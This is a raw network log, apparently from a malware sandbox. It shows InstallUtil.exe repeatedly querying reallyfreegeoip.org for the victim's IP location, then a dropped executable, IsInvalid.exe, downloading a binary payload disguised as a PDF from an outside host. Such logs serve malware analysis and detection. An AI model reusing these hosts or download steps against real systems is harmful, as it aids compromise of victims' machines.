                                                                    2024-10-30 00:42:08 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.449733188.114.97.34435544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:09 UTC63OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-10-30 00:42:09 UTC891INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:09 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56439
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ElQYF%2BancbtqERLMtobpzJVGas25F3OGwdqkCyBHLVkjYn55ZRp4LVrbP8FB3wJxWeeSxwjYxc%2FZPYzKRM%2F8FrjtL3pqmk95Zm4cKy3LIcttoo%2BJXhyO1%2BsC45%2FIU45ah7USBZ2K"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75d1f1d292e6d-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1541&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2090974&cwnd=243&unsent_bytes=0&cid=246ef81a0840a02e&ts=149&x=0"
                                                                    2024-10-30 00:42:09 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.449735188.114.97.34435544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:10 UTC63OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-10-30 00:42:10 UTC887INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:10 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56440
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HVw8xL7Joc18iOQDxAvzpnHzBlsc%2Ba1twYX%2B7IH7PrGZYlkQapwjC4RI1IvcPtBfHbEvzKBgbvisN6Z1Kbet4PuwG7qrO%2B443uhC5DlTWA%2FyeZiczhd0zkB2XmN8c9haC2TpQi6a"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75d281e63e7eb-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1133&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2078966&cwnd=251&unsent_bytes=0&cid=adb971a39bb9cf2a&ts=156&x=0"
                                                                    2024-10-30 00:42:10 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.449737188.114.97.34435544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:11 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-10-30 00:42:12 UTC885INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:12 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56442
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lauBKz%2BhwnXy6OEclShExfL2BfHNdxs0Atl88TvEfoL3uW2ba5x7HTCPvFLIMJBWQQGhfodL24ikJhF%2F4lwhSvl8n3lGa9dLkSGiUmf8Ee5lFLX7YEv1pT5D6y1eNzJdZ2%2B1xK5A"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75d310f364775-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1085&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2458404&cwnd=251&unsent_bytes=0&cid=e9b860ac97333842&ts=161&x=0"
                                                                    2024-10-30 00:42:12 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.449739188.114.97.34435544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:13 UTC63OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-10-30 00:42:13 UTC885INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:13 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56443
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4JTCHF9MBV6LCpTlifHEdoJ1EKtlYd35oexvf7osAXzfwa3tvAILefEEkuRbqDKEbNBpV%2B%2FVPwrJOpf2v3jxT63IinEuyHO%2Beaih2QTifEb5pr2DYSFrbAuSYCaBzyJZ5GMmixum"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75d3a1a5e46e9-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1781&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1599116&cwnd=248&unsent_bytes=0&cid=b4aec0d5c4b9a8b6&ts=172&x=0"
                                                                    2024-10-30 00:42:13 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.449741188.114.97.34435544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:14 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-10-30 00:42:15 UTC883INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:15 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56444
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f1kPpsotMzbt4apygyK168fBbY7g8%2B3aj30i2Y3bkQih5O3y5SrOLCBoVvLWxNQe8kNV27pwwsyNwjWRih8cFymZc3pOA8Iez%2FFlIIQ1x3Mz5vIyZnvpSCDH5J2vmxDywYQhivEN"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75d439d14469b-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1091&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2553791&cwnd=251&unsent_bytes=0&cid=898e66f7013e3697&ts=229&x=0"
                                                                    2024-10-30 00:42:15 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.449743188.114.97.34435544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:16 UTC63OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-10-30 00:42:16 UTC879INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:16 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56446
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rIOXtXkZU2eNwtzO6B28ATSMeoGGiLKEpv7wAoIafgcHKubqSsTRJZPTt5Q3EXObC8abX1SJTPnBtlTp021nzvddCZVUKfCnqastyU6WKA9FhKa1jzDaUQH7E5Ghwq9TaBDj1LmH"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75d4cec03e84f-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1133&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2671586&cwnd=236&unsent_bytes=0&cid=3937072b41f12495&ts=158&x=0"
                                                                    2024-10-30 00:42:16 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.449746188.114.97.34435544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:17 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-10-30 00:42:18 UTC883INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:17 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56447
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HR2qPbfxxFXublOo5TA%2FdVDHTFdOcElPFkJcL0eEWAfsgjpgHvKMZi9MS%2Bb2ZWBZ05IOnGdyODMDhcYpPOeCccdiTlmxxBR6kXr0SN7jnRjZJAsZHFsCmAgwnWSEeClmuBfFKj5y"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75d55ff356b91-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1198&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2401326&cwnd=251&unsent_bytes=0&cid=052caf9bb88c6f10&ts=177&x=0"
                                                                    2024-10-30 00:42:18 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.449749190.107.177.804433688C:\Users\user\AppData\Roaming\IsInvalid.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:19 UTC80OUTGET /Yinmwpj.pdf HTTP/1.1
                                                                    Host: nexoproducciones.cl
                                                                    Connection: Keep-Alive
                                                                    2024-10-30 00:42:20 UTC317INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:20 GMT
                                                                    Server: Apache
                                                                    Last-Modified: Mon, 28 Oct 2024 12:32:17 GMT
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 951816
                                                                    Cache-Control: max-age=2592000, public
                                                                    Expires: Fri, 29 Nov 2024 00:42:20 GMT
                                                                    Vary: Accept-Encoding
                                                                    Connection: close
                                                                    Content-Type: application/pdf
                                                                    2024-10-30 00:42:20 UTC7875INData Raw: bb 18 15 e2 bb 99 db fa 71 5c 3f d3 91 41 44 1c 35 1c 6f a3 c5 27 10 a9 62 5f 8d ec a6 eb 6c ce aa 6c c3 f6 85 ea cb 98 c5 eb ea fd 72 17 ff 1c 17 c1 04 39 0a 11 08 e6 8d d7 b7 26 6e 0f ce fe 67 e0 35 65 42 04 36 0b 2e 9c 3d 56 12 04 d1 f3 ed 0d 5f 97 2e 45 fa e7 9b a5 31 89 ec 17 74 7c 12 96 e5 36 e7 c5 e2 93 8e 19 fa 8d 02 8f ba 91 01 71 ae e2 ce 40 e5 83 d6 6b 37 67 38 30 1a be 23 13 1b 80 c2 c8 4c f6 ac 4f 68 e8 33 87 70 02 00 aa b7 44 05 86 16 80 d7 b8 01 10 8a b9 a2 a2 dc d8 0b 7c 3d f1 b1 b0 5f af 51 0d e5 ff 47 03 81 9a 72 2e 77 93 7d 39 44 41 3d 3c ca 7f 05 15 bd 45 e3 4a e7 67 83 fb 1a 4f ec 3c c1 d1 ba 92 92 69 9b d1 6d 6d 30 a3 0a 08 53 aa 1e 7c 17 d8 2e 34 11 98 85 6f 55 5d bb ff 31 24 35 01 73 22 2a 6d f9 9f 8c f3 d1 f9 43 4e e7 6d b0 4b 18
                                                                    Data Ascii: q\?AD5o'b_llr9&ng5eB6.=V_.E1t|6q@k7g80#LOh3pD|=_QGr.w}9DA=<EJgO<imm0S|.4oU]1$5s"*mCNmK
                                                                    2024-10-30 00:42:20 UTC8000INData Raw: 2d 18 a3 40 e8 9b 33 59 f2 3c c0 a0 db 43 67 e3 e9 08 9e 17 61 17 fb c6 c6 eb 5a 5d a1 d8 94 2f 76 b6 72 1b c3 ce ca 51 9a 84 cd c3 ea 4f e8 16 d5 f8 1b 82 42 81 f0 61 20 48 f9 e3 ba b5 d2 fe 38 33 90 27 d6 5c c1 a5 ca df a7 d6 80 ec 55 be ab 1b 50 6c e4 d3 2c 65 30 7f ba 24 d2 7a 97 22 d4 bc 71 69 ca 82 66 9c f8 ae 03 6f c9 09 2b a6 bf af 14 ce 40 a8 57 3c a3 93 4a 83 c0 7a ce 5c 4b 9d bb 79 cb ec a8 a4 4d 56 7f b6 08 10 64 43 ac 51 ff f7 09 7b d7 59 ea 1e 03 86 be 54 80 bc 51 af 73 66 a8 4e d7 48 6b e4 a2 28 89 31 28 31 08 7f 2c c4 ee 1f 83 49 96 c5 f4 cb 01 43 ca 9e 6f a3 5a 2a d4 54 9c 76 3d 79 df e2 0e db 46 66 62 7e 4f 49 be 31 85 82 7a 06 ac 8b 35 ce c2 9e a0 fc e8 28 0c e0 c0 a7 5a 54 f5 d0 53 74 9d 68 45 9a ee ef 2f b0 7b b5 88 ba 0e 30 8c 6a 9a
                                                                    Data Ascii: -@3Y<CgaZ]/vrQOBa H83'\UPl,e0$z"qifo+@W<Jz\KyMVdCQ{YTQsfNHk(1(1,ICoZ*Tv=yFfb~OI1z5(ZTSthE/{0j
                                                                    2024-10-30 00:42:20 UTC8000INData Raw: e1 04 a8 b4 be 97 0b 95 03 d7 f7 fe ec 63 7b fb d7 ed cf ad 83 53 91 10 b1 95 72 d6 54 74 ea 5a 47 cd 10 0c 0f ea 0b 12 44 e5 dc eb 35 83 b7 2d fa f9 d0 17 4e dd 62 7c e1 ea 7c 49 dd f5 8f ca 39 23 4f c5 90 7b 14 d3 ae 12 77 29 de 45 7b c0 71 8b 40 1c e5 c7 a3 e7 ea 30 44 b2 aa 71 4b bf 85 da 80 ee 57 69 82 9c eb b6 6f dc 29 39 9d fb 6b b4 24 b7 fd 3b e9 df 50 79 39 7c 78 1b b0 e1 aa 1a 48 cd a3 ad 05 60 54 ab a2 16 9a 73 c7 3e e4 40 f5 de 33 ff 3e 83 6c da 71 fc 6b 88 d2 70 93 55 ce 3c 7a 89 84 11 2c e7 3c 0a 46 aa 2b e4 7a 2f fc b0 3d 95 54 25 33 75 17 16 78 0f 4e 8b 71 9f 08 6e ec c4 33 ed 17 e2 5d b6 97 ff c5 9b 48 53 d8 bc eb e1 31 88 b5 ef 31 e1 97 ef a1 34 e9 59 59 2f bd 86 97 a7 2c 90 c6 06 53 ae ff b2 0a 63 8c 78 77 74 d3 1c 01 98 35 c3 5a 6b 5e
                                                                    Data Ascii: c{SrTtZGD5-Nb||I9#O{w)E{q@0DqKWio)9k$;Py9|xH`Ts>@3>lqkpU<z,<F+z/=T%3uxNqn3]HS114YY/,Scxwt5Zk^
